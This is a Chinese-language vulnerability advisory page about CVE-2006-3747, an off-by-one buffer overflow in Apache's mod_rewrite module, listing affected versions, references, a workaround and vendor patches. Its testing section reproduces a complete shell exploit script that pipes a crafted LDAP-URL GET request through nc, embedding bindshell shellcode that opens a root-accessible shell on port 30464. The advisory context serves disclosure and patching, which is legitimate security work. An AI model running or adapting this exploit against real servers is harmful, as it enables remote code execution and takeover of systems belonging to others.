首页 -> 安全研究

安全研究

安全漏洞
Apache mod_rewrite模块单字节缓冲区溢出漏洞

发布日期:2006-07-28
更新日期:2006-08-22

受影响系统:
Apache Group Apache 2.2.x >= 2.2.0
Apache Group Apache 2.0.x >= 2.0.46
Apache Group Apache 1.3.x >= 1.3.28
不受影响系统:
Apache Group Apache 2.2.3
Apache Group Apache 2.0.59
Apache Group Apache 1.3.37
描述:
BUGTRAQ  ID: 19204
CVE(CAN) ID: CVE-2006-3747

Apache是一款开放源代码WEB服务程序。

Apache的mod_rewrite模块在转义绝对URI主题时存在单字节缓冲区溢出漏洞,攻击者可能利用此漏洞在服务器上执行任意指令。

mod_rewrite模块的escape_absolute_uri()函数分离LDAP URL中的令牌时,会导致在字符指针数组以外写入指向用户控制数据的指针,这样就可能完全控制受影响的主机。

<*来源:Mark Dowd
  
  链接:http://secunia.com/advisories/21197/print/
        http://www.apache.org/dist/httpd/Announcement1.3.html
        http://www.apache.org/dist/httpd/Announcement2.0.html
        http://www.apache.org/dist/httpd/Announcement2.2.html
        http://www.kb.cert.org/vuls/id/395412
        ftp://patches.sgi.com/support/free/security/advisories/20060702-01-I.asc
        http://www.debian.org/security/2006/dsa-1132
        http://www.debian.org/security/2006/dsa-1131
        http://security.gentoo.org/glsa/glsa-200608-01.xml
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez :P

echo -e "mod_rewrite apache off-by-one overflow\nby jack <jack\x40gulcas\x2eorg>\n\n"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"
  exit
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6%31%c0%31 %db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04%31%c0%89%46%10%b0%10%89%46%08% b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db%cd %80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\nHost:$host\r\n\r\n" | nc $host 80

http://www.milw0rm.com/exploits/3680

建议:
临时解决方法:

* 禁用Apache的mod_rewrite模块。

厂商补丁:

Apache Group
------------
http://www.debian.org/security/2006/dsa-1132

Debian
------
Debian已经为此发布了安全公告(DSA-1132-1, DSA-1131-1)以及相应补丁:
DSA-1132-1:New apache2 packages fix buffer overflow
链接:http://www.debian.org/security/2005/dsa-1132

DSA-1131-1:New apache package fix buffer overflow
链接:http://www.debian.org/security/2005/dsa-1131

Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200608-01)以及相应补丁:
GLSA-200608-01:Apache: Off-by-one flaw in mod_rewrite
链接:http://security.gentoo.org/glsa/glsa-200608-01.xml

所有Apache用户都应升级到最新版本:

    # emerge --sync
    # emerge --ask --oneshot --verbose net-www/apache

浏览次数:12003
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障